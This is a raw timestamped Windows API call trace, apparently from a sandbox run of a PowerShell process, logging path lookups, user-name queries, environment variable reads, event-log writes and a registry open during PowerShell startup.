	[0488.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.804] CoTaskMemAlloc (cb=0x804) returned 0x1b84fd80
	[0488.804] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84fd80, nSize=0x1ed568 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed568) returned 0x1
	[0488.805] CoTaskMemFree (pv=0x1b84fd80) 
	[0488.805] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0488.805] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed5a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed5a8) returned 1
	[0488.805] CoTaskMemFree (pv=0x43c750) 
	[0488.806] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3061bd0*="Variable", lpRawData=0x3061960) returned 1
	[0488.808] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0488.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.808] CoTaskMemFree (pv=0x484300) 
	[0488.914] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0488.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.914] CoTaskMemFree (pv=0x484300) 
	[0488.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0488.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0488.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0488.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0489.709] CoTaskMemAlloc (cb=0x804) returned 0x1b8597f0
	[0489.709] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8597f0, nSize=0x1ed568 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed568) returned 0x1
	[0490.472] CoTaskMemFree (pv=0x1b8597f0) 
	[0490.472] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0490.472] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed5a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed5a8) returned 1
	[0490.472] CoTaskMemFree (pv=0x43c750) 
	[0490.473] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30757e8*="Certificate", lpRawData=0x3075578) returned 1
	[0491.303] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0491.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.303] CoTaskMemFree (pv=0x484300) 
	[0491.307] GetLogicalDrives () returned 0x4
	[0491.307] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ed1f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0491.307] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0491.309] CoTaskMemAlloc (cb=0x20e) returned 0x48bae0
	[0491.309] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x48bae0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0491.309] CoTaskMemFree (pv=0x48bae0) 
	[0491.311] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0491.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.311] CoTaskMemFree (pv=0x484300) 
	[0491.311] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0491.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.311] CoTaskMemFree (pv=0x484300) 
	[0491.333] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0491.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.334] CoTaskMemFree (pv=0x484300) 
	[0491.336] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0491.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.336] CoTaskMemFree (pv=0x484300) 
	[0491.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.337] SetErrorMode (uMode=0x1) returned 0x1
	[0491.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed1b0 | out: lpFileInformation=0x1ed1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0491.337] SetErrorMode (uMode=0x1) returned 0x1
	[0491.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.337] SetErrorMode (uMode=0x1) returned 0x1
	[0491.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed1b0 | out: lpFileInformation=0x1ed1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0491.337] SetErrorMode (uMode=0x1) returned 0x1
	[0491.337] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0491.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0491.338] CoTaskMemFree (pv=0x484300) 
	[0491.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.984] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0491.984] SetErrorMode (uMode=0x1) returned 0x1
	[0491.984] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed170 | out: lpFileInformation=0x1ed170*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0491.985] SetErrorMode (uMode=0x1) returned 0x1
	[0491.985] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0491.985] SetErrorMode (uMode=0x1) returned 0x1
	[0491.985] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed170 | out: lpFileInformation=0x1ed170*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0491.985] SetErrorMode (uMode=0x1) returned 0x1
	[0491.985] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecf70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0491.985] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ece60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0491.985] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0491.986] SetErrorMode (uMode=0x1) returned 0x1
	[0491.986] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ed170 | out: lpFileInformation=0x1ed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0491.986] SetErrorMode (uMode=0x1) returned 0x1
	[0491.986] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0491.986] SetErrorMode (uMode=0x1) returned 0x1
	[0491.986] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ed170 | out: lpFileInformation=0x1ed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0491.986] SetErrorMode (uMode=0x1) returned 0x1
	[0491.986] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0491.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ece60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0491.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.987] SetErrorMode (uMode=0x1) returned 0x1
	[0491.987] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed170 | out: lpFileInformation=0x1ed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0491.987] SetErrorMode (uMode=0x1) returned 0x1
	[0491.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.987] SetErrorMode (uMode=0x1) returned 0x1
	[0491.987] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed170 | out: lpFileInformation=0x1ed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0491.987] SetErrorMode (uMode=0x1) returned 0x1
	[0491.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ece60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.988] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0491.988] SetErrorMode (uMode=0x1) returned 0x1
	[0491.988] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ed1b0 | out: lpFileInformation=0x1ed1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0491.988] SetErrorMode (uMode=0x1) returned 0x1
	[0491.988] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0491.988] SetErrorMode (uMode=0x1) returned 0x1
	[0491.988] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ed1b0 | out: lpFileInformation=0x1ed1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0491.989] SetErrorMode (uMode=0x1) returned 0x1
	[0491.989] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0491.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ecea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0491.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.989] SetErrorMode (uMode=0x1) returned 0x1
	[0491.989] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed1b0 | out: lpFileInformation=0x1ed1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0491.989] SetErrorMode (uMode=0x1) returned 0x1
	[0491.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.989] SetErrorMode (uMode=0x1) returned 0x1
	[0491.990] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed1b0 | out: lpFileInformation=0x1ed1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0491.990] SetErrorMode (uMode=0x1) returned 0x1
	[0491.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ecea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ed210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0491.992] SetErrorMode (uMode=0x1) returned 0x1
	[0491.992] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed470 | out: lpFileInformation=0x1ed470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0491.992] SetErrorMode (uMode=0x1) returned 0x1
	[0492.022] CoTaskMemAlloc (cb=0x804) returned 0x1b8597f0
	[0492.022] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8597f0, nSize=0x1ed7d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed7d8) returned 0x1
	[0492.730] CoTaskMemFree (pv=0x1b8597f0) 
	[0492.730] CoTaskMemAlloc (cb=0x204) returned 0x43c750
	[0492.730] GetUserNameW (in: lpBuffer=0x43c750, pcbBuffer=0x1ed818 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed818) returned 1
	[0492.731] CoTaskMemFree (pv=0x43c750) 
	[0492.731] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30ae4d0*="Available", lpRawData=0x30ae260) returned 1
	[0493.728] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0493.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.728] CoTaskMemFree (pv=0x484300) 
	[0493.728] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0493.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.728] CoTaskMemFree (pv=0x484300) 
	[0493.733] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0493.733] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0493.733] CoTaskMemFree (pv=0x484300) 
	[0493.733] CoTaskMemAlloc (cb=0x104) returned 0x484300
	[0493.733] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x484300, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0493.733] CoTaskMemFree (pv=0x484300) 
	[0493.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed7f8 | out: phkResult=0x1ed7f8*=0x364) returned 0x0
